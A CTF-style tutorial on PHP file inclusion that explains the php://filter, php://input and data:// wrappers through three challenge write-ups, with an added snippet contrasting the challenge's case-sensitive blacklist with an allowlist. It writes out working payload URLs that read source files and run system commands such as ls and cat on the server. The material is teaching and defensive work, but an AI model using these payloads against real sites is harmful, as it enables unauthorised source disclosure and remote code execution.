File inclusion vulnerabilities
php:// protocol
The two wrappers covered here are php://filter and php://input. php://filter is used to read source code, and php://input is used to execute PHP code.
One, php://filter
When it is combined with the include function, the php://filter stream is executed as a PHP file. So we generally base64-encode it to prevent it from being executed, and the encoded source is returned instead. This leads to arbitrary file reading.
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.php
Example: [ACTF2020 Freshman Competition] Include
Looking carefully at the URL, we find flag.php in it, which suggests that this challenge is a PHP pseudo-protocol problem.
Build a payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
Then base64-decode the output.
Example: [BSidesCF 2020] Had a bad day
The PHP pseudo-protocol can nest an extra layer in the path as a bypass and read any file, so flag.php can be read directly:
?category=php://filter/read=convert.base64-encode/woofers/resource=flag
Two, php://input
A read-only stream that can access the raw data of the request; the data in the POST request is executed as PHP code.
http://127.0.0.1/cmd.php?file=php://input
Example: Web_php_include
0x01 source code
First, open the challenge; the page displays the following PHP code:
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>
Method 1: This challenge uses the strstr() function, which is case sensitive, so here we can bypass strstr() directly.
View the source code:
Method 2: Execute commands with the data:// pseudo-protocol
Usage: data://text/plain;base64,xxxx (base64 encoded data)
data://text/plain,<?php system("ls")?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
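The filter from the source code above compared with an allowlist lookup, as an added example that is not part of the challenge or the original page. The function names and the page list are hypothetical, and the sample inputs are constructed from the wrapper forms shown above.

```php
<?php
// Added example. blacklist_filter() reproduces the challenge's loop;
// resolve_page() and PAGES are hypothetical names for the hardened form.

// The challenge's filter: strips only the lowercase literal "php://".
function blacklist_filter(string $page): string
{
    while (strstr($page, "php://")) {
        $page = str_replace("php://", "", $page);
    }
    return $page;
}

// Hardened form: the request value is only a key into a fixed map,
// so it never reaches include() as a path or a stream URL.
const PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;
}

// Constructed sample inputs (payload bodies replaced by placeholders).
$samples = [
    'home',
    'php://input',
    'PHP://input',
    'data://text/plain;base64,xxxx',
    'php://filter/read=convert.base64-encode/resource=index.php',
];

foreach ($samples as $s) {
    $filtered = blacklist_filter($s);
    // The blacklist has failed if a stream scheme is still present.
    $survives = preg_match('#^[a-z][a-z0-9+.-]*://#i', $filtered) === 1;
    $target   = resolve_page($s);
    printf("%-60s blacklist: %-12s allowlist: %s\n",
        $s,
        $survives ? 'wrapper kept' : 'no wrapper',
        $target ?? 'rejected');
}
```

With allow_url_include=Off (the PHP default), include() also refuses data:// and php://input. php://filter is not restricted by that setting, so the allowlist is still needed to stop source disclosure.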
0x02 summary:
1. The functions that cause file inclusion vulnerabilities usually include:
include, require, include_once, require_once, highlight_file, show_source, file_get_contents, fopen, file, readline
2. data:// protocol
Usage:
data://text/plain,xxxx (PHP code to be executed)
data://text/plain;base64,xxxx (base64 encoded data)
3. php:// protocol
php://input is used to execute PHP code; the data is submitted in a POST request.